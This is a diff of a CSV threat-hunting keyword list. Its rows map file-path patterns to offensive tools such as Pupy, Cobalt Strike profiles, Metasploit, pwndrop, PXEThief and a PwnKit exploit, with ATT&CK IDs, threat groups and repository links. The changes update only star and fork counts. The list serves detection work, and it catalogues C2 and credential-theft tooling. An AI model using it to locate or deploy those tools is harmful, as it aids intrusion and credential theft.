T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/PupyCompile.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/pupygen.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/pupylib/payloads/*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/PupyOffload.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/pupyps.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/PupyServer.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/PupyService.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/pupysh.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/PupyTriggers.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/PupyWeb.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" "*/putter.profile*","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1362","429","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" "*/PwnDB.py*","offensive_tool_keyword","SocialPwned","SocialPwned is an OSINT tool that allows to get the emails. from a target. published in social networks like Instagram. Linkedin and Twitter to find the possible credential leaks in PwnDB or Dehashed and obtain Google account information via GHunt.","T1596","TA0002","N/A","N/A","OSINT exploitation tools","https://github.com/MrTuxx/SocialPwned","1","1","N/A","N/A","9","800","93","2023-08-12T21:59:23Z","2020-04-07T22:25:38Z" "*/pwndrop.git*","offensive_tool_keyword","pwndrop","Self-deployable file hosting service for red teamers allowing to easily upload and share payloads over HTTP and WebDAV.","T1105 - T1071 - T1071.001 - T1090 - T1027 - T1027.005","TA0011 - TA0005 - TA0042","N/A","N/A","C2","https://github.com/kgretzky/pwndrop","1","1","N/A","10","10","1751","236","2023-02-25T05:08:15Z","2019-11-28T19:06:30Z" "*/pwndrop.ini*","offensive_tool_keyword","pwndrop","Self-deployable file hosting service for red teamers allowing to easily upload and share payloads over HTTP and WebDAV.","T1105 - T1071 - T1071.001 - T1090 - T1027 - T1027.005","TA0011 - TA0005 - TA0042","N/A","N/A","C2","https://github.com/kgretzky/pwndrop","1","0","N/A","10","10","1751","236","2023-02-25T05:08:15Z","2019-11-28T19:06:30Z" -"*/Pwned.as*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/Pwned.as*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*/PwnKit-Exploit*","offensive_tool_keyword","POC","exploitation of CVE-2021-4034","T1210","N/A","N/A","N/A","Exploitation tools","https://github.com/luijait/PwnKit-Exploit","1","1","N/A","N/A","1","79","14","2022-02-07T15:42:00Z","2022-01-26T18:01:26Z" -"*/pxesploit/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/pxesploit/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*/PXEThief*","offensive_tool_keyword","pxethief","PXEThief is a set of tooling that can extract passwords from the Operating System Deployment functionality in Microsoft Endpoint Configuration Manager","T1555.004 - T1555.002","TA0006","N/A","N/A","Credential Access","https://github.com/MWR-CyberSec/PXEThief","1","1","N/A","N/A","3","220","27","2023-05-18T19:55:17Z","2022-08-12T22:16:46Z" -"*/pxexploit*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/py_oneliner.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/pxexploit*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/py_oneliner.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" "*/pyasn1/*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" "*/pycobalt-*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*/pycobalt/*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" @@ -4884,7 +4931,7 @@ "*/pyrdp:latest*","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","1","can also be used by blueteam as a honeypot","10","10","1296","235","2023-07-28T14:33:09Z","2018-09-07T19:17:41Z" "*/Pysoserial.git*","offensive_tool_keyword","pysoserial","Python-based proof-of-concept tool for generating payloads that utilize unsafe Java object deserialization.","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","shell spawning","https://github.com/aStrowxyu/Pysoserial","1","1","N/A","9","1","9","1","2021-12-06T07:41:55Z","2021-11-16T01:55:31Z" "*/pystinger.zip*","offensive_tool_keyword","cobaltstrike","Bypass firewall for traffic forwarding using webshell. Pystinger implements SOCK4 proxy and port mapping through webshell. It can be directly used by metasploit-framework - viper- cobalt strike for session online.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/FunnyWolf/pystinger","1","1","N/A","10","10","1283","212","2021-09-29T13:13:43Z","2019-09-29T05:23:54Z" -"*/Python-dynload-os.h*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/Python-dynload-os.h*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" "*/pywerview*","offensive_tool_keyword","pywerview","A partial Python rewriting of PowerSploit PowerView","T1069.002 - T1018 - T1087.001 - T1033 - T1069.001 - T1087.002 - T1016 - T1482","TA0007 - TA0009","N/A","N/A","Reconnaissance","https://github.com/the-useless-one/pywerview","1","1","N/A","N/A","8","738","102","2023-10-02T14:57:20Z","2016-07-06T13:25:09Z" "*/pywhisker.git*","offensive_tool_keyword","pywhisker","Python version of the C# tool for Shadow Credentials attacks","T1552.001 - T1136 - T1098","TA0003 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/pywhisker","1","1","N/A","10","5","418","49","2023-10-03T14:10:17Z","2021-07-21T19:20:00Z" "*/pywsus.git*","offensive_tool_keyword","pywsus","The main goal of this tool is to be a standalone implementation of a legitimate WSUS server which sends malicious responses to clients. The MITM attack itself should be done using other dedicated tools such as Bettercap.","T1505.003 - T1001.001 - T1560.001 - T1071.001","TA0003 - TA0011 - TA0002","N/A","N/A","Network Exploitation tools","https://github.com/GoSecure/pywsus","1","1","N/A","N/A","3","248","38","2022-11-11T19:59:21Z","2020-08-11T21:44:35Z" @@ -4898,18 +4945,18 @@ "*/quake3-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/quake3-master-getservers.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/quantloader.profile*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","224","42","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" 